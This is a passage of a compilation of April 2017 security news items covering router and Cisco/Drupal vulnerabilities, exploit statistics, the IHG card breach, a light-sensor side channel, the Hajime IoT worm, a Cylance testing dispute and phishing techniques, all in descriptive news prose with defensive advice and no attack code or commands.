A Shodan search conducted by IOActive revealed 7,000 vulnerable devices that can be accessed directly from the Internet. Nearly 70 percent of them were located in the United States, followed by Canada, Hong Kong, Chile, Netherlands, Venezuela, Argentina, Russia, Sweden, Norway, China, India, UK and Australia.

While researchers have not found a way to bypass authentication in order to exploit the command injection vulnerability, they did determine that 11 percent of the 7,000 exposed devices had been using default credentials.

IOActive reported the vulnerabilities to Linksys in mid-January. The vendor is working on releasing firmware updates for affected devices and, in the meantime, it has provided some mitigation advice. The company recommends temporarily disabling the Guest Network feature, and changing the default admin password.

This research was conducted just a few months after IOActive reported finding multiple vulnerabilities in BHU Wi-Fi uRouter, a device manufactured and sold in China.


Cisco Fixes Serious Flaws in Security, Other Products

20.4.2017 securityweek Vulnerebility
Cisco has released software updates for its Firepower, IOS, Adaptive Security Appliance (ASA) and Unified Communications Manager (Unified CM) products to address high severity denial-of-service (DoS) vulnerabilities.

One of the flaws, identified as CVE-2016-6368, can affect several products running Cisco Firepower System Software, including ASA, Advanced Malware Protection (AMP), Firepower, Sourcefire 3D and Industrial Security appliances. An unauthenticated attacker can exploit the vulnerability remotely to cause a DoS condition.

Related: Cisco Launches New Firepower Firewalls

A DoS vulnerability (CVE-2017-3808) that can be exploited by a remote, unauthenticated attacker has also been found in Cisco Unified CM, namely in the session initiation protocol UDP throttling process.

Several high severity DoS flaws have also been discovered in the EnergyWise module of Cisco’s IOS and IOS XE software. EnergyWise is designed for monitoring and managing the power usage of devices in a domain, including networking devices and Power over Ethernet (PoE) endpoints.

Cisco has also published four advisories describing remotely exploitable weaknesses in its ASA software. The security holes affect components such as the IKEv1 XAUTH code, the SSL/TLS code, IPsec code and DNS code.

Two of the vulnerabilities can be exploited by an unauthenticated attacker, while the other two require authentication.

Most of these flaws have been discovered by Cisco itself and there is no evidence that any of them have been exploited for malicious purposes.

Cisco is one of the several tech companies whose products have been targeted by exploits described recently by WikiLeaks as part of a dump called “Vault 7.” The networking giant has discovered a zero-day vulnerability affecting many of its switches.

Patches have yet to be made available for the flaw and Cisco warned customers last week that a researcher has released a proof-of-concept (PoC) exploit.


Exploits: how great is the threat?
20.4.2017 Kaspersky Exploit

Full Report

How serious, really, is the danger presented by exploits? The recent leak of an exploit toolset allegedly used by the infamous Equation Group suggests it’s time to revisit that question. Several zero-days, as well as a bunch of merely ‘severe’ exploits apparently used in-the-wild were disclosed, and it is not yet clear whether this represents the full toolset or whether there’s more to come, related to either Equation or another targeted threat actor.

Of course, Equation Group is not the first, and is certainly not the only sophisticated targeted attacker to use stealthy, often zero-day exploits in its activity.

Today we are publishing an overview of the exploit threat landscape. Using our own telemetry data and intelligence reports as well as publically available information, we’ve looked at the top vulnerabilities and applications exploited by attackers.

We have examined them from two equally important perspectives. The first part of the report summarises the top exploits targeting all users in 2015-2016, and the most vulnerable applications. The second part considers the vulnerabilities exploited between 2010 and 2016 by significant targeted threat actors reported on by Kaspersky Lab: that’s 35 actors and campaigns in total.

Key findings on exploits targeting all users in 2015-2016:

In 2016 the number of attacks with exploits increased 24.54%, to 702,026,084 attempts to launch an exploit.
4,347,966 users were attacked with exploits in 2016 which is 20.85% less than in the previous year.
The number of corporate users who encountered an exploit at least once increased 28.35% to reach 690,557, or 15.76% of the total amount of users attacked with exploits.
Browsers, Windows, Android and Microsoft Office were the applications exploited most often – 69.8% of users encountered an exploit for one of these applications at least once in 2016.
In 2016, more than 297,000 users worldwide were attacked by unknown exploits (zero-day and heavily obfuscated known exploits).
2015-2016 witnessed a number of positive developments in the exploit threat landscape. For example, two very dangerous and effective exploit kits – Angler (XXX) and Neutrino, left the underground market, depriving cybercriminals community of a very comprehensive set of tools created to hack computers remotely.

A number of bug bounty initiatives aimed at highlighting dangerous security issues were launched or extended. Together with the ever-increasing efforts of software vendors to fix new vulnerabilities, this significantly increased the cost to cybercriminals of developing new exploits. A clear victory for the infosec community that has resulted in a drop of just over 20% in the number of private users attacked with exploits: from 5.4 million in 2015 to 4.3 million in 2016.

However, alongside this welcome decline, we’ve registered an increase in the number of corporate users targeted by attacks involving exploits. In 2016, the number of attacks rose by 28.35% to reach more than 690,000, or 15.76% of the total amount of users attacked with exploits. In the same year, more than 297,000 users worldwide were attacked by unknown exploits. These attacks were blocked by our Automatic Exploit Prevention technology, created to detect this type of exploits.

Key findings on exploits used by targeted attackers 2010 -2016:

Overall, targeted attackers and campaigns reported on by Kaspersky Lab in the years 2010 to 2016 appear to have held, used and re-used more than 80 vulnerabilities. Around two-thirds of the vulnerabilities tracked were used by more than one threat actor.
Sofacy, also known as APT28 and Fancy Bear seems to have made use of a staggering 25 vulnerabilities, including at least six, if not more zero-days. The Equation Group is not far behind, with approximately 17 vulnerabilities in its arsenal, of which at least eight were zero-days, according to public data and Kaspersky Lab’s own intelligence.
Russian-speaking targeted attack actors take three of the top four places in terms of vulnerability use (the exception being Equation Group in second place), with other English- and Chinese-speaking threat actors further down the list.
Once made public, a vulnerability can become even more dangerous: grabbed and repurposed by big threat actors within hours.
Targeted attackers often exploit the same vulnerabilities as general attackers – there are notable similarities between the list of top vulnerabilities used by targeted threat actors in 2010-2016, and those used in all attacks in 2015-2016.
When looking more closely at the applications used by targeted threat actors to mount exploit-based attacks, we weren’t surprised to discover that Windows, Flash and Office top the list.

Exploits: how great is the threat?

Applications and Operation Systems most often exploited by targeted attack groups.

Moreover, the recent leak of multiple exploits allegedly belonging to the Equation cyberespionage group highlighted another known but often overlooked truth: the life of an exploit doesn’t end with the release of a security patch designed to fix the vulnerability being exploited.

Our research suggests that threat actors are still actively and successfully exploiting vulnerabilities patched almost a decade ago – as can be seen in the chart below:

Exploits: how great is the threat?

Everyone loves an exploit

Exploits are an effective delivery tool for malicious payloads and this means they are in high demand among malicious users, whether they are cybercriminal groups, or targeted cyberespionage and cybersabotage actors.

To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.

Conclusion and Advice

The conclusion is a simple one: even if a malicious user doesn’t have access to expensive zero-days, the chances are high that they’d succeed with exploits to old vulnerabilities because there are many systems and devices out there that have not yet been updated.

Even though developers of popular software invest huge resources into finding and eliminating bugs in their products and exploit mitigation techniques, for at least the foreseeable future the challenge of vulnerabilities will remain.

In order to protect your personal or business data from attacks via software exploits, Kaspersky Lab experts advise the following:

Keep the software installed on your PC up to date, and enable the auto-update feature if it is available.
Wherever possible, choose a software vendor which demonstrates a responsible approach to a vulnerability problem. Check if the software vendor has its own bug bounty program.
If you are managing a network of PCs, use patch management solutions that allow for the centralized updating of software on all endpoints under your control.
Conduct regular security assessments of the organization’s IT infrastructure.
Educate your personnel on social engineering as this method is often used to make a victim open a document or a link infected with an exploit.
Use security solutions equipped with specific exploit prevention mechanisms or at least behavior-based detection technologies
Give preference to vendors which implement a multilayered approach to protection against cyberthreats, including exploits.


Hackers Steal Payment Card Data From Over 1,150 InterContinental Hotels
20.4.2017 thehackernews CyberCrime
InterContinental Hotels Group (IHG) is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on payment card systems at 1,174 franchise hotels in the United States.
It's the second data breach that U.K.-based IHG, which owns Holiday Inn and Crowne Plaza, has disclosed this year. The multinational hotel conglomerate confirmed a credit card breach in February which affected 12 of its hotels and restaurants.
What happened?
IHG identified malware accessing payment data from cards used at front desk systems between September 29 and December 29, 2016, but the malware was erased after the investigation got completed in March 2017.
"Many IHG-branded locations are independently owned and operated franchises and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations," read the notice published to IHG’s site on Friday.
What type of information?
The malware obtained credit card data, such as cardholders' names, credit card numbers, expiration dates and internal verification codes, from the card's magnetic stripe, although the company said there is no evidence of any unauthorized access to payment card data after late December.
However, the company can not confirm that the malware was removed until February and March 2017, when it began its investigation around the data breach.
How many victims?
The total number of affected customers is not revealed by the company, although customers can use a lookup tool IHG has posted on its website to search for hotels by city and state.
The company says this most recent breach mostly affects guests from U.S-based hotels, who stayed between September 29 and December 29, 2016. The 1,174 hotels breached in the US include, 163 in Texas, 64 in California, 61 in Florida, 53 in Indiana, 50 in Ohio, 45 in New York, 42 in Michigan, 39 in Illinois, among others.
Only one hotel in Puerto Rico, a Holiday Inn Express in San Juan, is the non-U.S. hotel that was hit by malware.
Who are not affected by the breach?
Those franchise hotel locations that had implemented IHG's Secure Payment Solution (SPS) – a point-to-point encryption payment acceptance solution – before 29th September 2016 were not affected by this data breach.
IHG is advising all franchise hotels to implement SPS in order to protect themselves from such malware attacks, though the company also said, many more properties implemented SPS after September 29, 2016, which ended the malware’s ability to find payment card data.
What is the IHG doing?
IHG has already notified law enforcement of the recent data breach.
Moreover, on behalf of franchisees, the company has been working closely with the payment card networks and the cyber security firm to confirm that the malware has been removed and evaluate ways for franchisees to enhance security measures.
What should IHG customers do?
Users are advised to review their payment card statements carefully and to report any unauthorized bank transactions.
You should also consider requesting a replacement card if you visited any of the affected properties during that three months duration when the breach was active.
"The phone number to call is usually on the back of your payment card. Please see the section that follows this notice for additional steps you may take," the company says.
IHG became the latest hotel chain to report a potential customer data breach in past few years, following the data breach in Hyatt, Hilton, Mandarin Oriental, Starwood, White Lodging and the Trump Collection that acknowledged finding malware in their payment systems.


Exfiltrating data from laptop and smartphones via ambient light sensors
20.4.2017 securityaffairs Mobil

A security researcher presented a method to exfiltrate sensitive data from a laptop or a smartphone through built-in ambient light sensors.
The security expert Lukasz Olejnik discovered that it is possible to steal sensitive data exploiting the ambient light sensors built-in many smartphones and laptops.

The ambient light sensors are installed on electronic devices to automatically change the screen brightness, but Olejnik is warning of the intention of the World Wide Web Consortium (W3C) “whether to allow websites access the light sensor without requiring the user’s permission.”

In this way, an attacker can analyze variations in brightness through ambient light sensors and steal sensitive data such as a QR code included on a web page that are used for authentication mechanisms.

“How exactly can ambient light readings allow extracting private data? Our attack is based on two observations:

The color of the user’s screen can carry useful information which websites are prevented from directly accessing for security reasons.
Light sensor readings allow an attacker to distinguish between different screen colors.” wrote Olejnik in a blog post.


As example, Olejnik reminds us that many sites change the color of links once a user has visited them, then the expert used the ambient light sensors to detect these changes and access users’ browsing history.

“For privacy reasons, browsers lie to developers about the colors of links displayed on a page; otherwise a malicious developer could apply :visited styles and detect which websites are present in the user’s history.” continues Olejnik.

The expert highlighted that such kind of attack is very slow, it took 48 seconds to detect a 16-character text string and three minutes and twenty seconds to recognize a QR code.

“In principle, browser sensors can deliver a 60 Hz readout rate. However, this does not mean that we can actually extract 60 bits per second – that’s because the ultimate detection limit is tied to the rate at which a change in screen brightness can be detected by the sensor.” explained Olejnik.

In the test conducted by the expert he and his team measured a screen brightness to readout latency of 200-300ms, and for a fully reliable exploit it’s more realistic to assume one bit per 500ms.

Below examples of detection times obtainable at the above rate:

Plain text string of 8 characters: 24 seconds (assuming 6 bits per character for an alphanumeric string rendered in a known font)
Plain text string of 16 characters: 48 seconds
20×20 QR code: 3 minutes 20 seconds
Detecting 1000 popular URLs in the history: 8 minutes 20 seconds
64×64 pixel image: 34 minutes 8 second
The good news is that the attack in some cases is not feasible because users would not keep a QR code on the screen for so long time.

Olejnik also proposes a countermeasure to mitigate the attack by limiting the frequency of ambient light sensors readings by API and quantized their output. In this way, the countermeasure will not impact the activity of the sensors preventing any abuse.

“The current proposal argues that the following protections are sufficient:

Limit the frequency of sensor readings (to much less than 60Hz)
Limit the precision of sensor output (quantize the result)” concluded Olejnik.


Introduction to the NIST CyberSecurity Framewor for a Landscape of Cyber Menaces
20.4.2017 securityaffairs Cyber

The implementation of the NIST CyberSecurity Framework is of vital importance for the changes taking place in the landscape of zero-day threats
The NIST CyberSecurity Framework is a guide for businesses and enterprises of good practices for information security. The NIST CyberSecurity Framework proposes a guide, which can adapt to each enterprise e for different needs.
 

The framework gives enterprises and businesses the possibility of applying the principles and the best practices of risk management to upgrade security and resilience of critical infrastructure. It provides organization and structure for the different insights of our time, with the best practices already adopted across the industry.

The Framework is an approach based on risk to manage cyber security risks and is composed of three parts: Framework Core, Framework Implementation Tiers, and Framework Profiles. Each part of the component of the Framework enforces the connection between business owners and the activities of cyber security.

In its composition, the Framework Core has five concurrent functions and continuous: Identity, Protect, Detect, Respond and Recover.

NIST CyberSecurity Framework

When placed together these functions give a strategic approach to the high level of the life cycle of risk management for cyber security of an organization. The Framework Implementation Tiers gives the context in which an organization understands the risk of cyber security and the processes established to manage that risk.

The Framework Profile can be defined as an alignment of patterns, guides, and practices of the Framework Core in a particular scenario of implementation. The Framework Profile can be used to identify opportunities for improving cyber security posture by comparing the actual Profile (“how it is”) with the target Profile (“how it will be”).

By being adaptive, the NIST CyberSecurity Framework can detect and respond to the new threats that appear from out of the thin air. This includes ransomware, IoT hacking and other new types of malware. The Risk Management is treated as an ongoing process to identify, assess and respond to risk. To manage risk it is proposed that organizations must understand the probability of occurrence of an event and the impact resulting from it.

This information gives organizations the capability of determining the acceptable risk level for delivering services, which is expressed by its risk tolerance. This understanding gives organizations the capacity of prioritizing the cyber security activities. It is important to adapt so organizations can respond. The NIST CyberSecurity Framework is available for small business, critical infrastructure services and organizations.

As cloud, big data and analytics reach a new level so does the possibility of damages for the health care, power grid, IoT and businesses. The Framework is elaborated in the form of Tier to cover all aspects of information security covering assets and employees best practices. This approach gives organizations the ability to isolate threats, in such way that detection and mitigation do not affect other assets of the organization.

Source:

https://gcn.com/articles/2017/03/31/cybersecurity-framework-revisions.aspx

nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf

http://csrc.nist.gov/groups/SMA/fisma/sp800-53r5_pre-draft.html

http://www.govinfosecurity.com/groups-say-nist-must-better-address-healthcares-cyber-needs-a-9841

http://www.nextgov.com/cybersecurity/2017/04/bill-improve-small-business-cybersecurity-advances/136750/

http://blog.executivebiz.com/2017/04/tech-firms-urge-nist-to-include-vulnerability-disclosure-processes-in-cybersecurity-framework/

http://www.govinfosecurity.com/groups-say-nist-must-better-address-healthcares-cyber-needs-a-9841

https://www.nist.gov/news-events/news/2014/10/nist-releases-final-version-smart-grid-framework-update-30

https://www.nist.gov/itl/ssd/systems-interoperability-group/health-it-testing-infrastructure


Drupal Patches Critical Access Bypass Flaw

20.4.2017 securityweek  Vulnerebility
Updates released for versions 8.2 and 8.3 of the Drupal content management system (CMS) address a critical access bypass vulnerability.

The flaw, discovered by Drupal developer Samuel Mortenson and tracked as CVE-2017-6919, has been classified as critical by the Drupal security team, but it only affects websites if certain conditions are met.

Websites are vulnerable to attacks exploiting this flaw if they have the RESTful Web Services (RESTWS) module enabled and they allow PATCH requests. The attacker must also be able to register an account on the targeted site.

Nevertheless, the security hole is potentially serious, which is why Drupal developers have released a patch not only for the 8.3 branch, but also for the 8.2 series, which has reached end of life and will not receive other updates.

Drupal has advised 8.2.x users to update to Drupal 8.2.8, but still recommends updating to Drupal 8.3 at a later time. In the case of Drupal 8.3, the vulnerability has been patched with the release of version 8.3.1. Drupal 7 is not affected.

Vulnerabilities involving the RESTWS module have been known to be exploited in the wild. In September 2016, researchers spotted attempts to exploit a RESTWS flaw that had been patched two months earlier.

The latest updates come only one day after Drupal announced the availability of a patch for a critical flaw affecting a popular third-party module.

The References module, used by more than 121,000 websites, had not been updated since 2013 and Drupal flagged it as unsupported. However, Drupal has managed to find a new maintainer for the module and the security hole has been fixed.


Symantec is monitoring the Hajime IoT malware, is it the work of vigilante hacker?
20.4.2017 securityaffairs IoT

Symantec observed the Hajime IoT malware leaving a message on the devices it infects, is it the work of a cyber vigilante?
The Mirai botnet is the most popular thingbot, it is targeting poorly configured and flawed ‘Internet of Things’ devices since August 2016, when the threat was first discovered by the researcher MalwareMustDie.
Many other bots threaten the IoT landscape, but recently an antagonist appeared in the wild, its name is Hajime.

Hajime has been spreading quickly in the last months, mostly in Brazil and Iran.

Hajime IoT malware

The Hajime malware was first spotted in October 2016, it used the same mechanism implemented by Mirai to spread itself. The threat targets unsecured IoT devices with open Telnet ports and still used default passwords. Researchers discovered Hajime uses the same list of username and password combinations that Mirai, plus two more.

Unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

“There isn’t a single C&C server address, instead the controller pushes command modules to the peer network and the message propagates to all the peers over time. This is typically considered a more robust design as it makes takedowns more difficult.” reads the analysis published by Symantec.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes. The threat has a modular structure allowing operators to add new capabilities on the fly.

The analysis of the Hajime reveals that it doesn’t implement denial of service (DDoS) capabilities or any other attacking code. Symantec researchers noticed that Hajime fetches a statement from its controller and displays it on the terminal every 10 minutes. The message is:

Just a white hat, securing some systems. Important messages will be signed like this!

Hajime Author.

Contact CLOSED

Stay sharp!

The message is digitally signed and the worm will only accept messages signed by a hardcoded key. Once infected a system, the worm blocks access to ports 23, 7547, 5555, and 5358, in order to prevent attacks from other IoT threats, including Mirai.

Experts believe Hajime could be the work of a cyber vigilante, in the past we have observed similar codes like the Linux.Wifatch discovered by Symantec in October 2015.

“The problem with these white worms is that they usually turn out to have a short lifespan. That is because their effects are only temporary. On the typical IoT system affected by these worms the changes made to improve the security are only in RAM and not persistent.” observed Symantec.

In the broadcast message, the author refers to themselves as the “Hajime Author” but the name Hajime appears nowhere in the binaries. The name “Hajime” didn’t come from the author, but from the researchers who discovered the malware.

“This shows that the author was aware of the researchers’ report and seemed to have liked the name.” concluded the analysis.

Experts from Symantec also discovered bugs in the Hajime IoT malware and provided signatures for detecting them.


Cylance Battles Malware Testing Industry

20.4.2017 securityweek Analysis  
Cylance vs. Malware Testing Industry

After a brief respite, the animosity between the incumbent anti-virus vendors and the newcomer machine learning (ML) endpoint protection vendors has returned; and the focus is still on testing.

On Monday this week, Ars Technica published an article with one new element: a test using 48 Cylance-provided malware samples showed 100% detection by Cylance, but somewhat less from competing products. It turned out that nine of the samples were harmless. This "led the engineer [conducting the tests]," wrote Ars, "to believe Cylance was using the test to close the sale by providing files that other products wouldn't detect -- that is, bogus malware only [Cylance] would catch."

On Tuesday, Cylance's vice president of product testing and industry relations, Chad Skipper, blogged about the Ars article and the 'harmless' samples. He explained that Cylance doesn't simply use known malware for tests, but alters them via the mpress and vmprotect packers so they effectively become unknown malware. Sometimes, however, the packing doesn't fully work, and actually renders the original malware harmless. This, he suggests, is closer to the real-life situation faced by end users.

Not all the questions raised by the Ars article are fully explained by Skipper. "Of the nine files in question," writes Ars, "testing by the customer, by Ars, and by other independent researchers showed that only two actually contained malware." Skipper responded, "We don't give empty files on purpose -- it's just not what we do."

Nevertheless, if seven of the 48 samples were incorrectly detected as malware by Cylance, that's a pretty high false positive rate of just over 14.5% -- a rate that would not have been detected had not the engineer looked more closely at the testing results.

This has led to some suggestions that Cylance is gaming the system. "It's unbelievable that businesses today can't trust the people who they rely on to keep them secure," commented Mike Viscuso, CTO and co-founder of endpoint security firm Carbon Black. "The actions Cylance has taken puts their customers and our national security at risk."

"Not sure if it can be called cheating," said Luis Corrons, technical director at PandaLabs, a competitor in the endpoint security space; "anyway it is clear to me that ethics are not an obstacle for Cylance to get new customers. They do not allow testers to do comparative testing of their solution unless they impose their methodology, therefore there is a lack of independent testing to validate their marketing claims, so they ask their prospects to do their own tests, and they give them a preselected set of 'malware'. He added that if he were to do similar at Panda, "I would be fired."

Cylance claims that the majority of independent third-party tests are biased in favor of the incumbent vendors that use malware signature databases (as well as other techniques, including their own use of machine learning). Those vendors in turn suggest that some (not all) ML-based vendors seek to bias the testing in their own favor, and threaten law suits if they do not get their own way. The threat became reality earlier this year when CrowdStrike sued testing firm NSS Labs.

One of Skipper's arguments is that other vendors use the Anti Malware Testing Standards Organization's (AMTSO) Real Time Threat List (RTTL). This list is largely known by the vendors, and consequently does not provide a genuine test.

While this may be true for some vendors' own tests, it is not generally true for third-party testing. Lists such as RTTL and the WildList are mostly used for product certification, but not for comparative testing. Independent researcher David Harley explained, "They're of considerably less use for comparative testing, as the testing industry has always been aware. After all, the point of comparative testing is to differentiate between products. A test restricted to malware which is already known to vendors (or a substantial majority thereof) is not going to show enormous differences."

This was confirmed by an independent third-party tester who asked not to be named. He described four methods of acquiring malware samples: from a vendor; from VirusTotal; from a third-party source such as a large corporation; and lastly, by monitoring the threat landscape and acquiring threats and attack methods independently. He, and he believes the majority of test labs, use the last method.

"Tests that use malware gathered using the first three approaches could put Cylance at a disadvantage versus vendors that suck in lots of files and generate signatures," he told SecurityWeek. "But I'm not sure that it's fair to say that all vendors do that. It seems a bit old-fashioned and error-prone. I also don't think it makes the tests unfair. It simply highlights the inconvenient fact that there are loads of threats and Cylance's approach is not perfect because it doesn't provide full coverage. Sure, it is at a disadvantage -- but one of its own making, not because the testing is wrong."

Harley agrees with this basic viewpoint. "If comparative testing was about the exclusive use of cooperatively verified lists, it would still be more accurate than using samples supplied by a single vendor and containing a high percentage of garbage files."

John Shaw, VP product management at Sophos, also a player in the next-gen endpoint security market, pointed out that the Cylance arguments against the third-party testing industry could more accurately be aimed at Cylance itself. "The leading testing organizations," he told SecurityWeek, "are working to improve their ability to test products in more representative 'real world' environment, using massively used techniques like infecting legitimate websites, and exploits against legitimate software. To do this at scale is hard and the industry still has a long way to go. Clearly for an individual customer to try and run a statistically significant test that simulates the real world is close to impossible, even with unlimited time." (Sophos previously published a stinging rebuke against Cylance's product comparison methods last summer.)

This doesn't mean it's impossible to self-test -- just very, very hard. "With testing," said Viscuso, "it's important to go beyond malware samples and test how the product handles real-world attacks. Malware samples alone are going to demonstrate one thing -- how well the product can stop the particular malware samples in your sample set. You're interested in stopping attacks, not just malware. Real world attackers don't rely on packed executables. They use documents, PowerShell, Python, Java, built-in OS tools, anything they can leverage to get the job done. To test the solution against real-world attack techniques, use a penetration testing framework such as Metasploit. Construct payloads with Veil-Evasion and use the techniques seen in real attacks. PowerShell Empire is also a great way to build PowerShell command lines and macro-enabled documents that go beyond executable malware samples."

It should be said that several vendors, including ML-based vendors and test laboratories, declined to comment: the issue is bitter and divisive. From those that did respond to SecurityWeek, the consensus is clear. Almost all agree that comparative third-party testing is difficult, but not impossible. And almost all, but one, agree that in rejecting independent testing, Cylance has replaced it with something far worse and potentially misleading. The exception is NSS Labs. "I don’t think Cylance did anything wrong," said Vikram Phatak, CEO of NSS Labs. "Their execution appears to have been problematic, but not their approach."


Personalized Spam and Phishing
20.4.2017 Kaspersky Spam

Most spam, especially the sort that is mass-mailed on behalf of businesses, has quite an impersonal format: spammers create a message template for a specific mailing purpose and often drastically diversify the contents of that template. Generally, these kinds of messages do not personally address the recipient and are limited to common phrases such as “Dear Client”. The most that personal data is ever involved is when the name of the mailbox (or part of it) is substituted with the electronic address that the spammer has. Any specifics that may help the recipient ascertain whether the message is addressed personally to him or not, for example, an existing account number, a contract number, or the date of its conclusion, is missing in the message. This impersonality, as a rule, attests toa phishing attempt.

Lately, however, we have been noticing an opposite tendency occurring quite often, wherein fraud becomes personalized and spammers invent new methods to persuade the recipient that the message is addressed personally to him. Thus, in the malicious mailing that we discovered last month, spammers used the actual postal addresses of the recipients in messages to make them seem as credible as possible. This information is sold to evildoers as ready-to-use databases with physical addresses (they are frequently offered for sale in spam messages), collected by evildoers from open sources, or obtained by evildoers when hacking email accounts, for example. Of course, cybercriminals will not have very many of these addresses at their disposal (compared to generated addresses), but they are much more valuable.

Personalized Spam and Phishing

The way spammers organize their personalized attacks plays an important role as well. In general, messages are mass mailed on behalf of an existing company, while the technical headers of fake messages use the company’s actual details.

There are several ways to use valid details. The most unsophisticated method is spoofing, which is substitution of technical headers in messages. The headers can be easily placed with any mass mailing program. In particular, during the spoofing process, the “From” field contains the real address of the sender that the fraudsters have. In this case, spam will be mass-mailed on behalf of the spoofed company, which can stain the company’s reputation quite seriously. Yet, not all technical headers can be substituted when spoofing, and good anti-spam filters will not let these messages through.

Personalized Spam and Phishing

Another method entails sending spam from so-called hijacked infrastructure, which is much harder to do technically, as the mail server of the target company has to be hacked. After gaining control over it, an evildoer can start sending messages with legitimate technical headers from any email address owned by the company and on behalf of any employee who works there. At the same time, the fake message looks quite credible for anti-spam filters and freely travels from server to server, as all of the necessary certificates and digital signatures in the header correspond to genuine counterparts. This would result in losses by both the recipient, who takes the bait of the evildoers (network infection and theft of personal data or business information), and the company, whose infrastructure is abused by the evildoers.

Usually, cybercriminals select small businesses (with up to several dozen employees) as victims for hacking. Owners of so-called parked domains are of particular interest, as parked domains are used by a company without creating a website on these domains.

In the samples detected by us, personalized malicious spam was mass-mailed on behalf of an existing business that was a small company specialized in staff recruitment. The messages contained order delivery notifications that are typical of malicious spam, but also indicated the real postal addresses of the recipients. The messages also contained URLs that were located on legitimate domains and were constantly changing throughout the mailings. If a user navigates to the URL, then malicious software will be downloaded to the user’s computer.

In this way, we may affirm that spam is becoming more personalized and mailing is becoming targeted. With the rising digital literacy of users, this is exactly what evildoers rely upon; It is not so easy to remember all your subscriptions, all your online orders, or where you’ve left your personal data, including addresses. Such an information load calls for the use of smart security solutions and the employment of security measures to protect your “information-driven personality”.


To Protect Your Devices, A Hacker Wants to Hack You Before Someone Else Does
19.4.2017 thehackernews Hacking
It should be noted that hacking a system for unauthorised access that does not belong to you is an illegal practice, no matter what's the actual intention behind it.
Now I am pointing out this because reportedly someone, who has been labeled as a 'vigilante hacker' by media, is hacking into vulnerable 'Internet of Things' devices in order to supposedly secure them.
This is not the first time when any hacker has shown vigilance, as we have seen lots of previous incidents in which hackers have used malware to compromise thousands of devices, but instead of hacking them, they forced owners to make them secure.
Dubbed Hajime, the latest IoT botnet malware, used by the hacker, has already infected at least 10,000 home routers, Internet-connected cameras, and other smart devices.
But reportedly, it's an attempt to wrestle their control from Mirai and other malicious threats.
Mirai is an IoT botnet that threatened the Internet last year with record-setting distributed denial-of-service attacks against the popular DNS provider Dyn last October. The botnet designed to scan for IoT devices that are still using default passwords.
How the Hajime IoT Botnet Works
Hajime botnet works much like Mirai — it spreads via unsecured IoT devices that have open Telnet ports and uses default passwords — and also uses the same list of username and password combinations that Mirai botnet is programmed to use, with the addition of two more.
However, what's interesting about Hajime botnet is that, unlike Mirai, it secures the target devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be vectors used to attack many IoT devices, making Mirai or other threats out of their bay.
Unlike Mirai, Hajime uses a decentralized peer-to-peer network (instead of command and control server) to issue commands and updates to infected devices, which makes it more difficult for ISPs and Internet backbone providers to take down the botnet.
Hajime botnet also takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.
Besides this, Hajime botnet also lacks DDoS capabilities or any other hacking code except for the propagation code that lets one infected device search for other vulnerable devices and infects them.
One of the most interesting things about Hajime: the botnet displays a cryptographically signed message every 10 minutes or so on terminals. The message reads:
Just a white hat, securing some systems.
Important messages will be signed like this!
Hajime Author.
Contact CLOSED Stay sharp!
There's Nothing to Get Excited
No doubt, there's a temptation to applaud Hajime, but until users don't reboot their hacked devices.
Since Hajime has no persistence mechanism, which gets loaded into the devices' RAM, once the IoT device is rebooted, it goes back to its unsecured state, complete with default passwords and the Telnet port open to the world.
"One day a device may belong to the Mirai botnet, after the next reboot it could belong to Hajime, then the next any of the many other IoT malware/worms that are out there scanning for devices with hard coded passwords. This cycle will continue with each reboot until the device is updated with a newer, more secure firmware," the Symantec researchers explained.
There's another problem...
Hacking someone to prevent hacking is not a thing, that’s why we are also concerned about a related amendment passed by the United States — Rule 41 — which grants the FBI much greater powers to legally break into computers belonging to any country, take data, and engage in remote surveillance.
So, the most concerning issue of all — Is there any guarantee that the author of Hajime will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?


Tracking Pixels Used in Phishing Campaigns

19.4.2017 securityweek Phishing  
Tracking Pixels Used in Phishing Campigns

Very small image files that can track user behavior have started to emerge in phishing campaigns, where hackers use them to gather information on their targets, Check Point researchers warn.

These very small image files are designed to send a string of code to an outside website. Usually of only one pixel in size, these images can also be hidden by setting them to the same color as the background of a web page, which allows them to go unnoticed by the user. They can also be used in emails, with the same purpose, and are called tracking pixels because of their small size and obvious purpose.

The code in these pixels is meant to ping the website when the image is downloaded, and can be designed to “capture information such as IP addresses, hostnames, operating systems, Web-browser types, dates the image was viewed, use of cookies, and other information,” Check Point explains.

This information is most often used by marketers to fine tune their advertising, but cybercriminals can also abuse the technique to gather information on cloud-platform components and discover known software vulnerabilities they can exploit in a later attack.

Check Point also explains that phishers can use tracking pixels in their attacks to learn which recipients are most likely to open their scam emails. Phishing attacks that leverage tracking pixels as a surveillance tool have been already observed in the wild, Check Point says.

“Since some scammers retool mass phishing attacks against random users to target high-value enterprise users, scammers are turning to pixel tracking to increase the odds a spear phishing attack will succeed,” the researchers reveal.

The researchers observed tracking pixels in phishing emails in August 2016, when in-place filters prevented the image from loading, which resulted in a red x placeholder image being displayed instead. These small images, Check Point says, threaten privacy in more than emails and web pages.

“For well over a decade, it has been understood that you can utilize tracking pixels in Microsoft Office files like Word documents, Excel spreadsheets and PowerPoint presentations. This works because Office files can link to an image located on a remote Web server. Putting a tracking pixel in an Office document allows you to be able to track a document’s activity as it moves through an organization,” the security firm notes.

While not found to be the direct cause of any specific security breach, tracking pixels are used for their surveillance capabilities in activities that precede attacks against users and infrastructure. The good news, however, is that it’s easy to stay protected.

Enterprises are advised to deploy email and anti-phishing security controls as part of their cloud-security arsenal, as well as to ensure that any software running in a cloud environment is patched at all times. Using web application security to protect any unpatched software should also help prevent intrusion. Looking for anomalous image placeholders when downloading pictures in advertising emails is also a good idea.


Critical vulnerability in Drupal References Module opens 120,000 Sites to hack
19.4.2017 securityaffairs Vulnerebility

A critical vulnerability affects the Drupal References module that is used by hundreds of thousands of websites using the popular CMS.
The Drupal security team has discovered a critical vulnerability in a third-party module named References.

